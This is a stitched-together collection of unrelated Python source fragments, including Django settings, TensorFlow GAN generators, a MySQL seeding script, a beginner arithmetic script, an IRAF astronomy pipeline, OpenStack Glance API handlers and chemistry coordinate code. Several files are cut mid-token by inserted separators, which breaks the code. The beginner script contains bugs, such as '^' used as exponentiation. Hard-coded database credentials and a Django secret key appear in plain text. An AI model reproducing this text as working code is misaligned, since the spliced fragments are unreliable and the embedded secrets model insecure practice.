        'rest_framework.permissions.IsAuthenticated',
    ),
    'DEFAULT_AUTHENTICATION_CLASSES': (
        'rest_framework_jwt.authentication.JSONWebTokenAuthentication',
    ),
}

JWT_AUTH = {
    'JWT_SECRET_KEY': secret_key_from_file('secret_key_jwt'),
    'JWT_ALLOW_REFRESH': True,
    'JWT_EXPIRATION_DELTA': datetime.timedelta(seconds=18000),
}

# For debug toolbar
INTERNAL_IPS = ["127.0.0.1"]

# Machine-local overrides take precedence over everything above.
from turbosettings.settings_local import *
|
import tensorflow as tf
from tensorflow.python.keras.layers import Conv2D, Conv2DTranspose, Conv3D, Dense, Reshape
tfgan = tf.contrib.gan
def basic_generator(noise):
    """Simple generator to produce MNIST images.

    Args:
        noise: A single Tensor representing noise.

    Returns:
        A generated image in the range [-1, 1].
    """
    reshape_channels = 256
    hidden = Dense(1024, activation='elu')(noise)
    hidden = Dense(7 * 7 * reshape_channels, activation='elu')(hidden)
    hidden = Reshape([7, 7, reshape_channels])(hidden)
    hidden = Conv2DTranspose(64, kernel_size=4, strides=2, padding='same', activation='elu')(hidden)
    hidden = Conv2DTranspose(32, kernel_size=4, strides=2, padding='same', activation='elu')(hidden)
    # tanh keeps the generator output in the same range as `inputs`, i.e. [-1, 1].
    return Conv2D(1, kernel_size=4, activation='tanh', padding='same')(hidden)
def conditional_generator(inputs):
    """Generator to produce MNIST images conditioned on a class label.

    Args:
        inputs: A 2-tuple of Tensors (noise, one_hot_labels).

    Returns:
        A generated image in the range [-1, 1].
    """
    noise, one_hot_labels = inputs
    reshape_channels = 128
    hidden = Dense(1024, activation='elu')(noise)
    # Inject the label conditioning into the hidden representation.
    hidden = tfgan.features.condition_tensor_from_onehot(hidden, one_hot_labels)
    hidden = Dense(7 * 7 * reshape_channels, activation='elu')(hidden)
    hidden = Reshape([7, 7, reshape_channels])(hidden)
    hidden = Conv2DTranspose(64, kernel_size=4, strides=2, padding='same', activation='elu')(hidden)
    hidden = Conv2DTranspose(32, kernel_size=4, strides=2, padding='same', activation='elu')(hidden)
    # tanh keeps the generator output in the same range as `inputs`, i.e. [-1, 1].
    return Conv2D(1, kernel_size=4, activation='tanh', padding='same')(hidden)
def encoder_decoder_generator(start_img):
    """Encoder/decoder generator: downsample twice, then upsample back.

    Args:
        start_img: Input image batch tensor.

    Returns:
        A 3-channel image tensor in the range [-1, 1].
    """
    down1 = Conv2D(64, kernel_size=4, strides=2, activation='elu', padding='same')(start_img)
    down2 = Conv2D(64, kernel_size=4, strides=2, activation='elu', padding='same')(down1)
    bottleneck = Conv2D(64, kernel_size=4, strides=1, activation='elu', padding='same')(down2)
    up1 = Conv2DTranspose(64, kernel_size=4, strides=2, activation='elu', padding='same')(bottleneck)
    up2 = Conv2DTranspose(64, kernel_size=4, strides=2, activation='elu', padding='same')(up1)
    refined = Conv2D(64, kernel_size=2, strides=1, activation='elu', padding='same')(up2)
    # tanh keeps the generator output in the same range as the inputs, i.e. [-1, 1].
    return Conv2D(3, kernel_size=1, activation='tanh', padding='same')(refined)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Author: Robin Wen
# Date: 2014-11-18
# Desc: Connect to MySQL using MySQLdb package, and insert test data.
import MySQLdb as mdb

# NOTE(review): database credentials are hard-coded in source; move them to
# a config file or environment variables before sharing/deploying.
con = mdb.connect(host='10.10.3.121', user='robin', passwd='robin89@DBA', db='testdb', unix_socket='/tmp/mysql5173.sock', port=5173)

# Using the connection as a context manager commits on success (rolls back
# on error); it does not close the connection, hence the explicit close below.
with con:
    cur = con.cursor()
    # Recreate the Writers table from scratch, then seed it.
    cur.execute("DROP TABLE IF EXISTS Writers")
    cur.execute("CREATE TABLE Writers(Id INT PRIMARY KEY AUTO_INCREMENT, \
Name VARCHAR(25))")
    cur.execute("INSERT INTO Writers(Name) VALUES('Jack London')")
    cur.execute("INSERT INTO Writers(Name) VALUES('Honore de Balzac')")
    cur.execute("INSERT INTO Writers(Name) VALUES('Lion Feuchtwanger')")
    cur.execute("INSERT INTO Writers(Name) VALUES('Emile Zola')")
    cur.execute("INSERT INTO Writers(Name) VALUES('Truman Capote')")
con.close()
|
#import factorial
#import square
x = int(raw_input("What is 'x'?\n"))
y = int(raw_input("What is y?\n"))
# question0 = str(raw_input("Define a y value? (y/n)\n"))
# if (question0 == "y","Y","yes","Yes"):
# y = int(raw_input("What will 'y' be?\n"))
# elif (y == "n","N","no","No"):
# question2 = str(raw_input("Is y = 10 ok?\n"))
# if (question2 == "y","Y","yes","Yes"):
# y = 10
# elif (question2 == "n","N","no","No"):
# y = int(raw_input("What will 'y' be?\n"))
# else:
# print "Please insert and interger"
# else:
# print "Please insert an interger."
print "Using that information, we can do some mathematical equations."
if x > y: #is not None:
print "x, %d, is greater than y, %d." % (x, y)
elif x == y: #is not None:
print "x, %d, is equal to y, %d." % (x, y)
elif x < y: #is not None:
print "x, %d, is less than y, %d." % (x, y)
elif x is not int:
print "x should be a interger, you put it as %d" % (x)
elif x is None:
print "Please rerun the code."
else:
print "Something went wrong!"
add = (x + y)
sub = (x - y)
mult = | (x * y)
div = (x / y)
rem = (x % y)
xeven = (x % 2 == 0)
xodd = (x % 2 != 0)
yeven = (y % 2 == 0)
yodd = (y % 2 != 0)
# xfact = (factorial(x))
# yfact = (factorial(y))
print "If you add x and y, you'll get %s." % add
print "If you subtract x and y, you'll get %s." % sub
print "If you mul | tiply x and y, you'll get %s." % mult
print "If you divide x and y, you'll get %s, with a remainder of %s." % (div, rem)
if (x % 2 == 0):
print "x is even."
if (x % 2 != 0):
print "x is odd."
if (y % 2 == 0):
print "y is even."
if (y % 2 != 0):
print "y is odd."
print "If you square x, you get %s, and y squared is %s." % ((x^2),(y^2))
print "If you cube x, you get %s, and y cubed is %s." % ((x^3), (y^3))
#print "If you take x factorial, you get %s, and y factorial is %s." % ((xfact), (yfact))
#print "The square root of x is %s, and the square root of y is %s." % (square(x), square(y))
print ""
# from sys import argv
# import random
# value = (1,2,3,4,5,6)
# roll, string = argv
# def choice(roll):
# random.choice(dice)
# return choice
# choice(roll)
# dice = choice(value) |
import pygame
import sys
from psistatsrd.app import App
def create_queue_row(data, config):
    """Build a StatRow for one host from its queue payload.

    Args:
        data: dict with at least 'hostname' and 'ipaddr' ('ipaddr' may be
            a single string or a list of strings).
        config: flat dict of UI settings (statrow.*, scroller.*, graph.*).

    Returns:
        A StatRow with 'scroller', 'cpu' and 'mem' drawables attached.
    """
    mem_graph = create_mem_graph(config)
    cpu_graph = create_cpu_graph(config)

    # Normalise 'ipaddr' to a list of lines for the scroller.
    # (isinstance replaces the original fragile type-name string check,
    # and also accepts list subclasses; unused `title` local removed.)
    ipaddr = data['ipaddr']
    scroll_text = list(ipaddr) if isinstance(ipaddr, list) else [ipaddr]
    scroller = create_scroller(scroll_text, config)

    row = create_row(config)
    row.host = data['hostname']
    row.add_drawable('scroller', scroller, App.DRAW_EVENT)
    row.add_drawable('cpu', cpu_graph, App.POLL_EVENT)
    row.add_drawable('mem', mem_graph, App.POLL_EVENT)
    return row
def create_row(config):
    """Construct an empty StatRow styled from the `statrow.*` config keys."""
    return StatRow(
        border_width=int(config['statrow.border_width']),
        border_color=config['statrow.border_color'],
        height=int(config['statrow.height']),
        width=int(config['statrow.width']),
        bgcolor=config['statrow.bgcolor'],
        title_font_size=int(config['statrow.title_font_size']),
        title_font_aa=config['statrow.title_font_aa'],
        title_font=config['statrow.title_font'],
        title_color=config['statrow.title_color'],
    )
def create_scroller(scroll_text, config):
    """Construct a Scroller for `scroll_text` styled from `scroller.*` keys."""
    return Scroller(
        scroll_speed=float(config['scroller.scroll_speed']),
        scroll_delay=int(config['scroller.scroll_delay']),
        scroll_pause=int(config['scroller.scroll_pause']),
        text_font=config['scroller.font.name'],
        text_aa=config['scroller.font.aa'],
        text_size=int(config['scroller.font.size']),
        width=int(config['scroller.width']),
        height=int(config['scroller.height']),
        color=config['scroller.color'],
        bgcolor=config['scroller.bgcolor'],
        text_lines=scroll_text,
    )
def create_resource_graph(key, config):
    """Build a Graph2 for resource `key` (e.g. 'cpu' or 'mem') from config."""
    def cfg(name):
        # All graph settings live under 'graph.<key>.<name>'.
        return config['graph.%s.%s' % (key, name)]

    graph = Graph2(
        height=int(cfg('height')),
        width=int(cfg('width')),
        line_width=int(cfg('line_width')),
        color=cfg('color'),
        bgcolor=cfg('bgcolor'),
        line_aa=cfg('line_aa'),
    )

    # min/max line colours are optional overrides.
    max_color_key = 'graph.%s.max_color' % key
    if max_color_key in config:
        graph.max_color = config[max_color_key]
    min_color_key = 'graph.%s.min_color' % key
    if min_color_key in config:
        graph.min_color = config[min_color_key]
    return graph
def create_cpu_graph(config):
    """Convenience wrapper: build the CPU graph (config keys `graph.cpu.*`)."""
    return create_resource_graph('cpu', config)
def create_mem_graph(config):
    """Convenience wrapper: build the memory graph (config keys `graph.mem.*`)."""
    return create_resource_graph('mem', config)
from psistatsrd.app import App
from psistatsrd.graph2 import Graph2
from psistatsrd.scroller import Scroller
from psistatsrd.statrow import StatRow
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# pipeline.py
# AstroObject
#
# Created by Alexander Rudy on 2012-04-25.
# Copyright 2012 Alexander Rudy. All rights reserved.
#
u"""
Basic CCD Reduction Pipeline written with AstroObject
"""
# Python Imports
import shutil
import os
import collections
# Numpy Imports
import numpy as np
# Package Resources Imports
from pkg_resources import resource_filename
# PyRAF Imports
from pyraf import iraf
from iraf import imred, ccdred
from AstroObject.simulator import Simulator
from AstroObject.simulator import (
optional,
description,
include,
replaces,
depends,
excepts,
collect,
ignore,
help
)
from AstroObject.image import ImageStack
from AstroObject.iraftools import UseIRAFTools
from AstroObject.loggers import logging
# Wrap ImageStack so instances gain the IRAF file-exchange helpers
# (iraf.inatfile/outfile/done, iin/iout/idone) used by the stages below.
ImageStack = UseIRAFTools(ImageStack)
class Pipeline(Simulator):
    """A task manager for the RC Pipeline.

    Each method is a pipeline stage discovered by ``self.collect()``;
    decorators (@depends/@include/@help/@ignore) control scheduling.
    """

    def __init__(self):
        super(Pipeline, self).__init__(commandLine=True, name="Example Pipeline", version="1.0")
        # Defaults ship with the package; "Main" is the user-facing config file.
        self.config.load(resource_filename(__name__, "Defaults.yaml"))
        self.config.setFile("Main")
        self.config.load()
        self.collect()

    @ignore  # Don't load this method as a stage... it is a helper method used to implement other stages.
    def load_type(self, key, stack):
        """Load a specific type of files using a generalized loading procedure.

        `key` selects the config section (e.g. "Bias"); every file listed
        under `<key>.Files` is read into `stack`.
        """
        if isinstance(self.config[key]["Files"], collections.Sequence):
            ReadStates = []
            for filename in self.config[key]["Files"]:
                ReadStates += stack.read(filename)
                self.log.debug("Loaded %s: %s" % (key, filename))
            return ReadStates
        else:
            self.log.error("No %s files are given." % key)
            raise IOError("No %s files are given." % key)

    def load_bias(self):
        """Loading Raw Bias Frames"""
        # Load individual bias frames.
        self.bias = ImageStack()
        self.load_type("Bias", self.bias)
        # Set Header Values for each image so ccdred recognises their type.
        for frame in self.bias.values():
            frame.header.update('IMAGETYP', 'zero')
            self.log.debug("Set IMAGETYP=zero for frame %s" % frame)
        self.log.debug("Set Header IMAGETYP=zero for frames %r" % self.bias.list())

    def load_dark(self):
        """Loading Dark Frames"""
        # Load individual dark frames.
        self.dark = ImageStack()
        self.load_type("Dark", self.dark)
        # Set Header Values for each image.
        for frame in self.dark.values():
            frame.header.update('IMAGETYP', 'dark')
            self.log.debug("Set IMAGETYP=dark for frame %s" % frame)
        self.log.debug("Set Header IMAGETYP=dark for frames %r" % self.dark.list())

    def load_flat(self):
        """Loading Flat Frames"""
        # BUG FIX: docstring said "Loading Dark Frames" and the summary log
        # below listed self.dark instead of self.flat (copy-paste slips).
        self.flat = ImageStack()
        self.load_type("Flat", self.flat)
        # Set Header Values for each image.
        for frame in self.flat.values():
            frame.header.update('IMAGETYP', 'flat')
            self.log.debug("Set IMAGETYP=flat for frame %s" % frame)
        self.log.debug("Set Header IMAGETYP=flat for frames %r" % self.flat.list())

    @help("Create bias frames from the configured bias list.")
    @depends("load-bias")  # Declare a dependency on another stage: Method ``load_bias()``.
    def create_bias(self):
        """Creating Combined Bias Frame"""
        self.log.debug("Running iraf.zerocombine on image list...")
        iraf.unlearn(iraf.zerocombine)
        iraf.zerocombine(self.bias.iinat(),
            output=self.bias.iout("Bias"),
            combine=self.config["Bias.Combine"],
            ccdtype="zero",
            reject=self.config["Bias.Reject"],
            scale="none", nlow=0, nhigh=1, nkeep=1, mclip="yes", lsigma=3.0, hsigma=3.0, rdnoise="0.", gain="1."
        )
        self.bias.idone()

    @help("Create Dark Frames")
    @depends("load-dark")
    def create_dark(self):
        """Creating Combined Dark Frame"""
        self.log.debug("Running iraf.darkcombine on image list...")
        iraf.unlearn(iraf.darkcombine)
        iraf.darkcombine(self.dark.iraf.inatfile(),
            output=self.dark.iraf.outfile("Dark"),
            combine=self.config["Dark.Combine"],
            ccdtype="dark",
            reject=self.config["Dark.Reject"],
            process="no", scale="exposure", nlow=0, nhigh=1, nkeep=1, mclip="yes", lsigma=3.0, hsigma=3.0, rdnoise="0.", gain="1."
        )
        self.dark.iraf.done()

    @help("Create Flat Frames")
    @depends("load-flat")
    def create_flat(self):
        """Creating Combined Flat Frame"""
        # (typo "Runnign" fixed in the log message below)
        self.log.debug("Running iraf.flatcombine on image list...")
        iraf.unlearn(iraf.flatcombine)
        iraf.flatcombine(self.flat.iraf.inatfile(),
            output=self.flat.iraf.outfile("Flat"),
            combine=self.config["Flat.Combine"],
            ccdtype="flat",
            reject=self.config["Flat.Reject"],
            scale=self.config["Flat.Scale"],
            process="no", subsets="no", nlow=0, nhigh=1, nkeep=1, mclip="yes", lsigma=3.0, hsigma=3.0, rdnoise="0.", gain="1.")
        self.flat.iraf.done()

    def load_data(self):
        """Loading Raw Data into the system."""
        self.data = ImageStack()
        self.load_type("Data", self.data)

    @include  # Set this stage as something to be run with the *all macro.
    @depends("create-bias", "load-data")
    @help("Subtract Bias Frame")
    def subtract_bias(self):
        """Subtracting Bias Frame"""
        iraf.unlearn(iraf.ccdproc)
        iraf.ccdproc(self.data.iraf.modatfile(),
            ccdtype="", fixpix="no", overscan="no", trim="no", zerocor="yes", darkcor="no", flatcor="no",
            zero=self.bias.iin("Bias"))
        self.data.idone()

    @include  # Set this stage as something to be run with the *all macro.
    @depends("create-dark", "load-data")
    @help("Subtract Dark Frame")
    def subtract_dark(self):
        """Subtracting Dark Frame"""
        iraf.unlearn(iraf.ccdproc)
        iraf.ccdproc(self.data.iraf.modatfile(),
            ccdtype="", fixpix="no", overscan="no", trim="no", zerocor="no", darkcor="yes", flatcor="no",
            dark=self.dark.iin("Dark"))
        self.data.idone()

    @include  # Set this stage as something to be run with the *all macro.
    @depends("create-flat", "load-data")
    @help("Divide out flat frame")
    def divide_flat(self):
        """Dividing by Flat Frame"""
        iraf.unlearn(iraf.ccdproc)
        iraf.ccdproc(self.data.iraf.inatfile(),
            output=self.data.iraf.outatfile(append="-Flat"),
            flat=self.flat.iin("Flat"),
            ccdtype="", fixpix="no", overscan="no", trim="no", zerocor="no", flatcor="yes", darkcor="no")
        self.data.iraf.done()

    # Since the simulator loads and runs stages in order, this stage will always
    # be run last.
    @include  # Set this stage as something to be run with the *all macro.
    @depends("load-data")
    def save_file(self):
        """Save the new fits file"""
        self.data.write("DataFile.fits", frames=[self.data.framename], clobber=True)

    @help("Save Partial Images")
    @depends("create-flat", "create-dark", "create-bias")
    def save_partials(self):
        """Saving partial images"""
        self.bias.write(frames=["Bias"], filename=self.config["Bias.Master"], clobber=True)
        self.dark.write(frames=["Dark"], filename=self.config["Dark.Master"], clobber=True)
        self.flat.write(frames=["Flat"], filename=self.config["Flat.Master"], clobber=True)
def main():
    """Entry point: build the pipeline and hand control to the Simulator CLI."""
    pipeline = Pipeline()
    pipeline.run()

if __name__ == '__main__':
    main()
|
"""
Django settings for todo project.
Generated by 'django-admin startproject' using Django 1.9.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this | : os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirn | ame(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '-b9xx8+eul3#8q&c@tv^5e!u66j=a6@377$y^b2q!0a%vj+!ny'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
DJANGO_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
THIRD_PARTY_APPS = []
CUSTOM_APPS = [
'tasks.apps.TasksConfig',
]
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + CUSTOM_APPS
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'todo.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['todo/templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'todo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
|
pace)
except (exception.Forbidden, exception.NotFound):
# NOTE (abhishekk): Returning 404 Not Found as the
# namespace is outside of this user's project
msg = _("Namespace %s not found") % namespace
raise webob.exc.HTTPNotFound(explanation=msg)
try:
# NOTE(abhishekk): This call currently checks whether user
# has permission to delete the namespace or not before deleting
# the objects associated with it.
policy_check = api_policy.MetadefAPIPolicy(
req.context,
md_resource=namespace_obj,
enforcer=self.policy)
policy_check.delete_metadef_namespace()
# NOTE(abhishekk): This call checks whether user
# has permission to delete the tags or not.
policy_check.delete_metadef_tags()
namespace_obj.delete()
ns_repo.remove_tags(namespace_obj)
except exception.Forbidden as e:
LOG.debug("User not permitted to delete metadata tags "
"within '%s' namespace", namespace)
raise webob.exc.HTTPForbidden(explanation=e.msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.msg)
def delete_properties(self, req, namespace):
    """Delete all properties belonging to a metadef namespace.

    Raises HTTP 404 when the namespace is missing or outside the
    caller's project, and HTTP 403 when policy denies the deletion.
    """
    ns_repo = self.gateway.get_metadef_namespace_repo(
        req.context, authorization_layer=False)
    try:
        namespace_obj = ns_repo.get(namespace)
    except (exception.Forbidden, exception.NotFound):
        # NOTE (abhishekk): Returning 404 Not Found as the
        # namespace is outside of this user's project
        msg = _("Namespace %s not found") % namespace
        raise webob.exc.HTTPNotFound(explanation=msg)
    try:
        # NOTE(abhishekk): This call currently checks whether user
        # has permission to delete the namespace or not before deleting
        # the objects associated with it.
        api_policy.MetadefAPIPolicy(
            req.context,
            md_resource=namespace_obj,
            enforcer=self.policy).delete_metadef_namespace()
        namespace_obj.delete()
        ns_repo.remove_properties(namespace_obj)
    except exception.Forbidden as e:
        LOG.debug("User not permitted to delete metadata properties "
                  "within '%s' namespace", namespace)
        raise webob.exc.HTTPForbidden(explanation=e.msg)
    except exception.NotFound as e:
        raise webob.exc.HTTPNotFound(explanation=e.msg)
def _prefix_property_name(self, namespace_detail, user_resource_type):
prefix = None
if user_resource_type and namespace_detail.resource_type_associations:
for resource_type in namespace_detail.resource_type_associations:
if resource_type.name == user_resource_type:
prefix = resource_type.prefix
break
if prefix:
if namespace_detail.properties:
new_property_dict = dict()
for (key, value) in namespace_detail.properties.items():
new_property_dict[prefix + key] = value
namespace_detail.properties = new_property_dict
if namespace_detail.objects:
for object in namespace_detail.objects:
new_object_property_dict = dict()
for (key, value) in object.properties.items():
new_object_property_dict[prefix + key] = value
object.properties = new_object_property_dict
if object.required and len(object.required) > 0:
required = [prefix + name for name in object.required]
object.required = required
return namespace_detail
class RequestDeserializer(wsgi.JSONRequestDeserializer):
    """Deserialize and validate incoming metadef-namespace API requests."""

    # Attributes clients may never set directly.
    _disallowed_properties = ['self', 'schema', 'created_at', 'updated_at']

    def __init__(self, schema=None):
        super(RequestDeserializer, self).__init__()
        self.schema = schema or get_schema()

    def _get_request_body(self, request):
        """Return the decoded JSON body, or raise HTTP 400 if absent."""
        output = super(RequestDeserializer, self).default(request)
        if 'body' not in output:
            msg = _('Body expected in request.')
            raise webob.exc.HTTPBadRequest(explanation=msg)
        return output['body']

    @classmethod
    def _check_allowed(cls, image):
        """Raise HTTP 403 if the body tries to set a read-only attribute."""
        for key in cls._disallowed_properties:
            if key in image:
                msg = _("Attribute '%s' is read-only.") % key
                raise webob.exc.HTTPForbidden(explanation=msg)

    def index(self, request):
        """Build sort/paging/filter query parameters for a list request."""
        params = request.params.copy()
        limit = params.pop('limit', None)
        marker = params.pop('marker', None)
        sort_dir = params.pop('sort_dir', 'desc')
        if limit is None:
            limit = CONF.limit_param_default
        # Validate *before* converting/comparing so that a non-integer
        # 'limit' query parameter yields HTTP 400 instead of an uncaught
        # ValueError from int() (which would surface as a 500).
        limit = min(CONF.api_limit_max, self._validate_limit(limit))
        query_params = {
            'sort_key': params.pop('sort_key', 'created_at'),
            'sort_dir': self._validate_sort_dir(sort_dir),
            'filters': self._get_filters(params)
        }
        if marker is not None:
            query_params['marker'] = marker
        if limit is not None:
            query_params['limit'] = self._validate_limit(limit)
        return query_params

    def _validate_sort_dir(self, sort_dir):
        """Accept only 'asc'/'desc'; raise HTTP 400 otherwise."""
        if sort_dir not in ['asc', 'desc']:
            msg = _('Invalid sort direction: %s') % sort_dir
            raise webob.exc.HTTPBadRequest(explanation=msg)
        return sort_dir

    def _get_filters(self, filters):
        """Validate filter values; only public/private visibility allowed."""
        visibility = filters.get('visibility')
        if visibility:
            if visibility not in ['public', 'private']:
                msg = _('Invalid visibility value: %s') % visibility
                raise webob.exc.HTTPBadRequest(explanation=msg)
        return filters

    def _validate_limit(self, limit):
        """Return *limit* as a non-negative int; raise HTTP 400 otherwise."""
        try:
            limit = int(limit)
        except ValueError:
            msg = _("limit param must be an integer")
            raise webob.exc.HTTPBadRequest(explanation=msg)
        if limit < 0:
            msg = _("limit param must be positive")
            raise webob.exc.HTTPBadRequest(explanation=msg)
        return limit

    def show(self, request):
        """Build query parameters (filters only) for a show request."""
        params = request.params.copy()
        query_params = {
            'filters': self._get_filters(params)
        }
        return query_params

    def create(self, request):
        """Validate a create body and return it as a Namespace object."""
        body = self._get_request_body(request)
        self._check_allowed(body)
        try:
            self.schema.validate(body)
        except exception.InvalidObject as e:
            raise webob.exc.HTTPBadRequest(explanation=e.msg)
        namespace = json.fromjson(Namespace, body)
        return dict(namespace=namespace)

    def update(self, request):
        """Validate an update body and return it as a Namespace object."""
        body = self._get_request_body(request)
        self._check_allowed(body)
        try:
            self.schema.validate(body)
        except exception.InvalidObject as e:
            raise webob.exc.HTTPBadRequest(explanation=e.msg)
        namespace = json.fromjson(Namespace, body)
        return dict(user_ns=namespace)
class ResponseSerializer(wsgi.JSONResponseSerializer):
def __init__(self, schema=None):
    """Store an optional schema; JSON rendering comes from the base class."""
    super(ResponseSerializer, self).__init__()
    self.schema = schema
def create(self, response, namespace):
    """Serialize a created namespace: 201 body plus a Location header."""
    ns_json = json.tojson(Namespace, namespace)
    response = self.__render(ns_json, response, http.CREATED)
    response.location = get_namespace_href(namespace)
def show(self, response, namespace):
    """Serialize a single namespace into the response body."""
    ns_json = json.tojson(Namespace, namespace)
    response = self.__render(ns_json, response)
def index(self, response, result):
params = dict(response.request.params)
params.pop('marker', None)
query = urlparse.urlencode(params)
result.first = "/v2/metadefs/namespaces"
result.schema = "/v2/schemas/metadefs/namespaces"
if query:
result.first = '%s?%s' % (result.first, |
n), subset of atoms in molecule Pn which are in Rm before reaction.")
report_mats("CP", CP)
def form_B(C):
    """Construct the B-matrices.

    Returns a dict with (m, n) keys, containing the respective
    subsets of C[(m, n)] that actually participate in bond-breaking/forming.
    """
    B = dict()
    for (m, n), union in C.items():
        key = (m, n)
        B.setdefault(key, set())
        # Keep only atoms involved in bond forming/breaking;
        # 'involved_atoms' is captured from the enclosing scope.
        B[key] |= set(union) & involved_atoms
    # Convert the accumulated sets to lists for downstream consumers.
    for k, v in B.items():
        B[k] = list(v)
    return B
BR = form_B(CR)
BP = form_B(CP)
print(
"BR(m, n), subset of atoms in CRnm actually involved in bond forming/breaking."
)
report_mats("BR", BR)
print(
"BP(m, n), subset of atoms in CPnm actually involved in bond forming/breaking."
)
report_mats("BP", BP)
AR = form_A(rfrags, which_rfrag, pbond_diff)
AP = form_A(pfrags, which_pfrag, rbond_diff)
print("AR(m, n), subset of atoms in Rm that form bonds to atoms in Rn.")
report_mats("AR", AR)
print(
"AP(m, n), subset of atoms in Pm which had bonds with Pn (formerly bonded in R)."
)
report_mats("AP", AP)
def form_G(A):
    """Collapse (m, n)-keyed atom-index collections onto fragment index m.

    Returns a dict mapping each fragment index m to the (non-empty)
    list of all atom indices appearing in any A[(m, *)] entry.
    """
    merged = {}
    for (m, _), indices in A.items():
        merged.setdefault(m, set()).update(indices)
    G = {}
    for frag, members in merged.items():
        member_list = list(members)
        # Every fragment reaching this point must contribute atoms.
        assert member_list
        G[frag] = member_list
    return G
GR = form_G(AR)
# GP = form_G(AP)
print(f"GR: {GR}")
# print(f"GP: {GP}")
# Initial, centered, coordinates and 5 stages
r_coords = np.zeros((6, runion.coords.size))
p_coords = np.zeros((6, punion.coords.size))
def backup_coords(stage):
    """Snapshot current reactant/product coordinates into slot *stage*.

    r_coords/p_coords (closure variables) hold one row per stage:
    the initial geometry plus the five preparation stages.
    """
    assert 0 <= stage < 6
    r_coords[stage] = runion.coords.copy()
    p_coords[stage] = punion.coords.copy()
"""
STAGE 1
Initial positioning of reactant and product molecules
"""
# Center fragments at their geometric | average
center_fragments(rfrag_lists, runion)
center_fragments(pfrag_lists, punion)
backup_coords(0)
# Translate reactant molecules
alphas = get_steps_to_active_atom_mean(
| rfrag_lists, rfrag_lists, AR, runion.coords3d
)
for rfrag, alpha in zip(rfrag_lists, alphas):
runion.coords3d[rfrag] += alpha
# Translate product molecules
betas = get_steps_to_active_atom_mean(
pfrag_lists, rfrag_lists, BR, punion.coords3d, skip=False
)
sigmas = get_steps_to_active_atom_mean(
pfrag_lists, rfrag_lists, CR, punion.coords3d, skip=False
)
bs_half = (betas + sigmas) / 2
for pfrag, bsh in zip(pfrag_lists, bs_half):
punion.coords3d[pfrag] += bsh
backup_coords(1)
print()
"""
STAGE 2
Intra-image Inter-molecular Hard-Sphere forces
"""
print(highlight_text("Stage 2, Hard-Sphere Forces"))
s2_hs_kappa = c["s2_hs_kappa"]
def hardsphere_sd_opt(geom, frag_lists, title):
    """Relax *geom* under pure hard-sphere forces via steepest descent.

    Used in stage 2 to remove inter-fragment clashes; s2_hs_kappa is
    captured from the enclosing scope.
    """
    print(highlight_text(title, level=1))
    calc = HardSphere(geom, frag_lists, kappa=s2_hs_kappa)
    geom.set_calculator(calc)
    # Loose convergence: only clash removal is needed, not a minimum.
    opt_kwargs = {
        "max_cycles": 1000,
        "max_step": 0.5,
        "rms_force": 0.05,
    }
    opt = SteepestDescent(geom, **opt_kwargs)
    opt.run()
hardsphere_sd_opt(runion, rfrag_lists, "Reactants")
hardsphere_sd_opt(punion, pfrag_lists, "Products")
backup_coords(2)
print()
"""
STAGE 3
Initial orientation of molecules
"""
print(highlight_text("Stage 3, Initial Orientation"))
# Rotate R fragments
if len(rfrag_lists) > 1:
alphas = get_steps_to_active_atom_mean(
rfrag_lists, rfrag_lists, AR, runion.coords3d
)
gammas = np.zeros_like(alphas)
for m, rfrag in enumerate(rfrag_lists):
Gm = GR[m]
gammas[m] = runion.coords3d[Gm].mean(axis=0)
r_means = np.array([runion.coords3d[frag].mean(axis=0) for frag in rfrag_lists])
for m, rfrag in enumerate(rfrag_lists):
gm = r_means[m]
rot_mat = get_rot_mat(gammas[m] - gm, alphas[m] - gm)
rot_coords = (runion.coords3d[rfrag] - gm).dot(rot_mat)
runion.coords3d[rfrag] = rot_coords + gm - rot_coords.mean(axis=0)
Ns = [0] * len(pfrag_lists)
for (m, n), CPmn in CP.items():
Ns[m] += len(CPmn)
# Rotate P fragments
for m, pfrag in enumerate(pfrag_lists):
pc3d = punion.coords3d[pfrag]
